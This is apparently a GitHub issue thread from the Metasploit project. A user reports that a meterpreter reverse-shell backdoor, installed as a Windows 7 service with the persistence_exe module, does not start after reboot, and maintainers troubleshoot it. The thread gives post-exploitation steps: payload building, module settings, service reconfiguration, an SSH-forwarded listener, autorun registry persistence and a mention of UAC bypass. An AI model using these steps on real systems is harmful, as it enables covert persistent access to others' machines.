Backdoor installed as SERVICE doesn't start on reboot automatically

[xmagickx]

Steps to reproduce

How'd you do it?

1. Exploited windows 7
2. Build a backdoor exe with veil staged meterpreter/reverse_tcp_dns python aes encrypted with LHOST as myssh & LPORT xxxx
3. Upload the backdoor using post/windows/manage/persistence_exe with the following settings.
   REXENAME= mybackdoor.exe
   REXEPATH= /usr/share/veil/payload.exe
   STARTUP= SERVICE
   SESSION= 1
   LocalExePath= c:/windows/system32
   StartupName= Backdoor
4. Uploaded successfully and executed the backdoor.
5. Modified windows services using shell
   sc config "Backdoor" obj= "NT AUTHORITY/NetworkService"
6. Reboot system.
7. Setup a payload listener to listen to 0.0.0.0:4444 & port forwarded using ssh -R xxxx:localhost:4444.
8. Not getting any session because service is not started automatically but I get session when I manually run the uploaded payload by exploiting again & running
   meterpreter> execute -f backdoor.exe

Victim- Windows 7 machine
9. meterpreter> run post/windows/gather/enum_services shows the service is installed & set to Autorun at startup.

Expected behavior

Service should run automatically the backdoor.exe file on startup.

Current behavior

Service and Backdoor.exe doesn't autorun on startup

System stuff

Metasploit version

4.16.65-dev

I installed Metasploit with:

• Kali package via apt

OS

What OS are you running Metasploit on?

Kali 2018.2

[Green-m]

With a quick test, I found there are some problems indeed with module persistent_exe.
I will try to finger out the problem later.

[xmagickx]

It works when I execute the payload manually.

…

On Thu 12 Jul, 2018, 5:58 PM Green-m, ***@***.***> wrote: With a quick test, I found there are some problems indeed with module persistent_exe. I will try to finger out the problem later. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNG4SGptjS0fZiEdXc9zLqIKbDEkZks5uF0D5gaJpZM4VMVaK> .

[xmagickx]

Do I have to edit the registry for payload to autostart on boot?

…

On Thu 12 Jul, 2018, 5:58 PM Green-m, ***@***.***> wrote: With a quick test, I found there are some problems indeed with module persistent_exe. I will try to finger out the problem later. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNG4SGptjS0fZiEdXc9zLqIKbDEkZks5uF0D5gaJpZM4VMVaK> .

[Green-m]

After the persistent_exe module completed, the session would connect back, and we got two sessions, one of them is NT AUTHORITY\SYSTEM, seems work well.

And then, I kill the sessions, but none of them would connect back again. The start type of the service has set to START_TYPE_AUTO.

sc qc  test1
[SC] QueryServiceConfig 成功

SERVICE_NAME: test1
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : cmd /c "C:\Users\T450\AppData\Local\Temp\default.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ggkqOfsn
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

but it is stopped

λ sc query  test1

SERVICE_NAME: test1
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

So I think this is the reason it didn't start after reboot. I will try to fix it.

[xmagickx]

Start type is set to AUTO. Strangely when I use a STAGELESS payload exe file with all settings remaining same with persistence_exe module it connects back every single time after reboots and starts automatically with boot as service but I don't get a stdapi session (only core meterpreter commands) even when I type "load stdapi" & meterpreter dies after few seconds. On the other hand when I use a STAGED payload exe file using persistence_exe module with all settings same as above I don't get the service running automatically on reboot and system (Windows 7) startup. But when I manually execute the file remotely using execute -f payload.exe post exploitation then I get a fully stdapi loaded session working flawlessly.

…

On Fri 13 Jul, 2018, 3:11 PM Green-m, ***@***.***> wrote: After the persistent_exe module completed, the session would connect back, and we got two sessions, one of them is NT AUTHORITY\SYSTEM, seems work well. And then, I kill the sessions, but none of them would connect back again. The start type of the service has set to START_TYPE_AUTO. sc qc test1 [SC] QueryServiceConfig 成功 SERVICE_NAME: test1 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : cmd /c "C:\Users\T450\AppData\Local\Temp\default.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ggkqOfsn DEPENDENCIES : SERVICE_START_NAME : LocalSystem but it is stopped λ sc query test1 SERVICE_NAME: test1 TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 So I think this is the reason it didn't start after reboot. I will try to fix it. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNCaMuQ8bMMUP9m516EJWsvyRVnYRks5uGGsvgaJpZM4VMVaK> .

[Green-m]

Weird. I have not tested these scenarios, I would deal with it next weekday, thanks. : ) On Jul 14, 2018, at 14:55, xmagickx <notifications@github.com<mailto:notifications@github.com>> wrote: Start type is set to AUTO. Strangely when I use a STAGELESS payload exe file with all settings remaining same with persistence_exe module it connects back every single time after reboots and starts automatically with boot as service but I don't get a stdapi session (only core meterpreter commands) even when I type "load stdapi" & meterpreter dies after few seconds. On the other hand when I use a STAGED payload exe file using persistence_exe module with all settings same as above I don't get the service running automatically on reboot and system (Windows 7) startup. But when I manually execute the file remotely using execute -f payload.exe post exploitation then I get a fully stdapi loaded session working flawlessly.

On Fri 13 Jul, 2018, 3:11 PM Green-m, ***@***.******@***.***>> wrote: After the persistent_exe module completed, the session would connect back, and we got two sessions, one of them is NT AUTHORITY\SYSTEM, seems work well. And then, I kill the sessions, but none of them would connect back again. The start type of the service has set to START_TYPE_AUTO. sc qc test1 [SC] QueryServiceConfig 成功 SERVICE_NAME: test1 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : cmd /c "C:\Users\T450\AppData\Local\Temp\default.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ggkqOfsn DEPENDENCIES : SERVICE_START_NAME : LocalSystem but it is stopped λ sc query test1 SERVICE_NAME: test1 TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 So I think this is the reason it didn't start after reboot. I will try to fix it. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNCaMuQ8bMMUP9m516EJWsvyRVnYRks5uGGsvgaJpZM4VMVaK> .

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub<#10291 (comment)>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AVfdHmp_KJk892fdtVV9rSfHwCVbMZwDks5uGZW_gaJpZM4VMVaK>.

[Green-m]

@xmagickx
We could not run non-service applications as service.
So the persistence_exe module only support to run a service-exe as a service. It's not perfect and couldn't replace the meterpreter script metsvc completely.

If you want to do that, you have 2 ways.

1. Write a service and compile it, code reference:
   https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp

2. Use third software like nssm, FireDaemon and so on.

[xmagickx]

The same thing happens when I use STARTUP as USER/SYSTEM on persistence_exe

…

On Mon 16 Jul, 2018, 2:41 PM Green-m, ***@***.***> wrote: @xmagickx <https://github.com/xmagickx> We could not run non-service applications as service. So the persistence_exe module only support to run a service-exe as a service. It's not perfect and couldn't replace the meterpreter script metsvc completely. If you want to do that, you have 2 ways. 1. Write a service and compile it, code reference: https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp 2. Use third software like nssm, FireDaemon and so on. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNPjnpVO5XT1_8Iu8fNptp4g_Bg20ks5uHFi4gaJpZM4VMVaK> .

[Green-m]

On my matchine, it works well.

msf5 post(windows/manage/persistence_exe) > exploit 

[*] Running module against WIN-4RG54QG99S7
[*] Reading Payload from file /root/Desktop/msf_dev/meterpreter_download_test.exe
[+] Persistent Script written to C:\Users\T450\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\T450\AppData\Local\Temp\default.exe
[+] Agent executed with PID 4704
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-4RG54QG99S7_20180716.5646/WIN-4RG54QG99S7_20180716.5646.rc
[*] Post module execution completed

[xmagickx]

I'm not getting this line that's the problem... Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test Is it because I'm installing the payload into c:/windows/system32

…

On Tue 17 Jul, 2018, 7:35 AM Green-m, ***@***.***> wrote: On my matchine, it works well. msf5 post(windows/manage/persistence_exe) > exploit [*] Running module against WIN-4RG54QG99S7 [*] Reading Payload from file /root/Desktop/msf_dev/meterpreter_download_test.exe [+] Persistent Script written to C:\Users\T450\AppData\Local\Temp\default.exe [*] Executing script C:\Users\T450\AppData\Local\Temp\default.exe [+] Agent executed with PID 4704 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test [*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-4RG54QG99S7_20180716.5646/WIN-4RG54QG99S7_20180716.5646.rc [*] Post module execution completed [image: image] <https://user-images.githubusercontent.com/22535454/42792479-0a6e4fbc-89a8-11e8-962f-3e44804a7f83.png> — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNEGFBNrIgz5B0wa5XVJfI0DKyJoxks5uHUZigaJpZM4VMVaK> .

[xmagickx]

I've administrator privileges...

…

On Tue 17 Jul, 2018, 9:32 AM Ranjan Mallick, ***@***.***> wrote: I'm not getting this line that's the problem... Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test Is it because I'm installing the payload into c:/windows/system32 On Tue 17 Jul, 2018, 7:35 AM Green-m, ***@***.***> wrote: > On my matchine, it works well. > > msf5 post(windows/manage/persistence_exe) > exploit > > [*] Running module against WIN-4RG54QG99S7 > [*] Reading Payload from file /root/Desktop/msf_dev/meterpreter_download_test.exe > [+] Persistent Script written to C:\Users\T450\AppData\Local\Temp\default.exe > [*] Executing script C:\Users\T450\AppData\Local\Temp\default.exe > [+] Agent executed with PID 4704 > [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test > [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\test > [*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-4RG54QG99S7_20180716.5646/WIN-4RG54QG99S7_20180716.5646.rc > [*] Post module execution completed > > > [image: image] > <https://user-images.githubusercontent.com/22535454/42792479-0a6e4fbc-89a8-11e8-962f-3e44804a7f83.png> > > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub > <#10291 (comment)>, > or mute the thread > <https://github.com/notifications/unsubscribe-auth/Af5qNEGFBNrIgz5B0wa5XVJfI0DKyJoxks5uHUZigaJpZM4VMVaK> > . >

[Green-m]

Maybe you should try to update the metasploit.

[xmagickx]

Using the latest metasploit 16.64-dev kali 2018.2...

…

On Tue 17 Jul, 2018, 11:32 AM Green-m, ***@***.***> wrote: Maybe you should try to update the metasploit. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNMNImY5MTVtByR19rigXO9LtUQPWks5uHX3ugaJpZM4VMVaK> .

[void-in]

@xmagickx I believe you would have to bypass UAC in order to copy a file in system32.

[xmagickx]

Have done that too...

…

On Tue 17 Jul, 2018, 4:44 PM Waqas Ali, ***@***.***> wrote: @xmagickx <https://github.com/xmagickx> I believe you would have to bypass UAC in order to copy a file in system32. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#10291 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/Af5qNBLTWcrl_mQu4Xrd_W35WJ5YHFsfks5uHcctgaJpZM4VMVaK> .